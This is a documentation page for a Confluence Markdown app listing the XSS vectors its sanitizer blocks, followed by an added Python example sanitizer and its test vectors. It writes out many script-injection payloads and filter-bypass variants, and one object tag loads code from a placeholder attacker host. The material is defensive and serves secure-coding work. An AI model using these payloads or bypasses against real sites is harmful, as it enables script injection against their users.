The Markdown for Confluence Cloud app sanitizes the HTML it renders by default. This page lists the cross-site scripting (XSS) vectors that are blocked when using the Cloud version of the app: each of the inputs below is neutralised rather than rendered as live markup.
Usage of the <a> tag with the 'href' attribute:
<a href='javascript:alert("Test");'>Test 1</a>
<a href='javascript:alert("Test Vulnerability through a href unicode");'>Test 2</a>
(or)
[javascript:alert('Test Vulnerability through a href');]
Usage of inline JavaScript:
<script>alert('Test Vulnerability through script');</script>
Usage of a script tag with an external include:
<script type="text/javascript" src="https://<somesite>/include.js"></script>
Usage of an iframe with an include:
<iframe src="https://bobswift.atlassian.com"></iframe>
Usage of 'onXxx' event handler attributes, irrespective of the tag they appear on:
<div style="padding: 20px; opacity: 0;height: 20px;" onmouseout="alert('Test Vulnerability through onXxx events')"></div>
<img src="smiley.gif" alt="Smiley face" height="42" width="42" onerror="alert('No file found')">
Usage of script in the src attribute (including the legacy dynsrc and lowsrc attributes):
<img src="javascript:alert('XSS');">
<img dynsrc="javascript:alert('XSS')">
<img lowsrc="javascript:alert('XSS')">
<input type="image" src="javascript:alert('XSS');">
Usage of script in the background attribute:
<body background="javascript:alert('XSS')">
<table background="javascript:alert('XSS')">
<td background="javascript:alert('XSS')">
Usage of the link tag with an href:
<link rel="stylesheet" href="javascript:alert('XSS');">
Usage of script in the style attribute (CSS url() and the legacy IE expression()):
<div style="background-image: url(javascript:alert('XSS'))">
<div style="width: expression(alert('XSS'));">
Usage of an object tag with an include:
<object type="text/x-scriptlet" data="http://hacker.com/xss.html">
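The following is an added example, not the app's own code (this page does not publish how the Markdown for Confluence Cloud sanitizer is implemented). It shows one way to neutralise every vector listed above with nothing but Python's standard-library html.parser: code-carrying elements (script, style, iframe, object) are dropped with their content, unknown elements such as body and link are unwrapped, every onXxx attribute is stripped whatever the tag, and URL attributes (href, src, dynsrc, lowsrc, background, data) are kept only when the scheme is on an allowlist. It goes a little beyond the page by also handling the usual bypasses of a naive "javascript:" string match: mixed case, a tab or newline inside the scheme, and a scheme written with an HTML character reference. The element allowlist, the scheme allowlist and the rejection of any CSS url() are design assumptions for this example; the sample inputs are constructed from the page's vectors (with their quoting normalised), and example.com is an assumed hostname.

```python
import html
import re
from html.parser import HTMLParser

# Elements whose content is code, not text: dropped together with everything inside.
# (Assumed defaults for this example, not the app's actual list.)
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed", "noscript"}
# Elements that survive; any other tag (body, link, form, ...) is removed and its text kept.
ALLOWED_TAGS = {
    "a", "p", "br", "hr", "b", "i", "em", "strong", "code", "pre", "blockquote",
    "div", "span", "img", "ul", "ol", "li", "table", "thead", "tbody", "tr", "th", "td",
    "h1", "h2", "h3", "h4", "h5", "h6",
}
# Attributes that carry a URL, checked on every tag (covers src, dynsrc, lowsrc, background, data).
URL_ATTRS = {"href", "src", "dynsrc", "lowsrc", "background", "data", "action", "formaction", "poster"}
SAFE_SCHEMES = {"http", "https", "mailto"}  # assumed allowlist

NAME_RE = re.compile(r"[a-z][a-z0-9-]*")
SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.-]*):")
JUNK_RE = re.compile(r"[\x00-\x20\x7f]")  # controls/whitespace browsers ignore inside a scheme
CSS_DANGER_RE = re.compile(r"expression\(|url\(|javascript:|vbscript:|@import|behavior:|-moz-binding")


def safe_url(value: str) -> bool:
    """Relative URLs pass; absolute URLs pass only with an allowlisted scheme."""
    m = SCHEME_RE.match(JUNK_RE.sub("", value).lower())
    return m is None or m.group(1) in SAFE_SCHEMES


def safe_style(value: str) -> bool:
    """Reject inline CSS that can load or run code; url() is refused outright (assumed policy)."""
    v = re.sub(r"/\*.*?\*/", "", value, flags=re.S)  # CSS comments are a classic evasion
    return CSS_DANGER_RE.search(JUNK_RE.sub("", v).lower()) is None


class Sanitizer(HTMLParser):
    """Rebuilds the fragment from parsed tokens, so malformed markup cannot smuggle attributes."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)  # attribute values arrive already unescaped
        self.out: list = []
        self.skip = 0  # nesting depth inside a dropped-with-content element

    def _attrs(self, attrs) -> str:
        kept = []
        for name, value in attrs:  # html.parser has already lowercased the name
            value = value or ""
            if not NAME_RE.fullmatch(name) or name.startswith("on"):
                continue  # malformed name, or an onXxx handler on any tag
            if name in URL_ATTRS and not safe_url(value):
                continue
            if name == "style" and not safe_style(value):
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        return "".join(kept)

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip += 1
        elif not self.skip and tag in ALLOWED_TAGS:
            self.out.append(f"<{tag}{self._attrs(attrs)}>")

    def handle_startendtag(self, tag, attrs):
        if not self.skip and tag in ALLOWED_TAGS:
            self.out.append(f"<{tag}{self._attrs(attrs)} />")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip = max(0, self.skip - 1)
        elif not self.skip and tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(html.escape(data, quote=False))  # re-escape text on the way out
    # Comments, doctypes and processing instructions fall through to the default no-op.


def sanitize(fragment: str) -> str:
    parser = Sanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


# Constructed sample input: this page's vectors (quoting normalised) plus encoded variants.
VECTORS = [
    """<a href='javascript:alert("Test");'>Test 1</a>""",
    "<script>alert('Test Vulnerability through script');</script>",
    '<iframe src="https://bobswift.atlassian.com"></iframe>',
    """<div style="opacity: 0;" onmouseout="alert('Test Vulnerability through onXxx events')"></div>""",
    """<img src="smiley.gif" alt="Smiley face" onerror="alert('No file found')">""",
    """<img dynsrc="javascript:alert('XSS')">""",
    """<td background="javascript:alert('XSS')">""",
    """<link rel="stylesheet" href="javascript:alert('XSS');">""",
    """<div style="width: expression(alert('XSS'));">""",
    '<object type="text/x-scriptlet" data="http://hacker.com/xss.html">',
    '<a href="java&#09;script:alert(1)">tab inside scheme</a>',
    '<a href="JaVaScRiPt:alert(1)">mixed case</a>',
    '<a href="https://example.com/?q=javascript:alert(1)">legitimate link</a>',  # example.com assumed
]

if __name__ == "__main__":
    for v in VECTORS:
        print(f"{v}\n  -> {sanitize(v)!r}")
```

The point to take from the design: the check is an allowlist on the parsed scheme, not a search for the string "javascript:". `java&#09;script:`, `JaVaScRiPt:` and ` javascript:` with leading whitespace all defeat a substring match but fail the allowlist, while an https URL that merely contains "javascript:" in its query string is kept. Re-emitting the fragment from the parser's tokens, rather than patching the original string, is what makes the broken-quoting variants on this page harmless as well: whatever the tokenizer makes of them, only attributes that pass the checks are written back out.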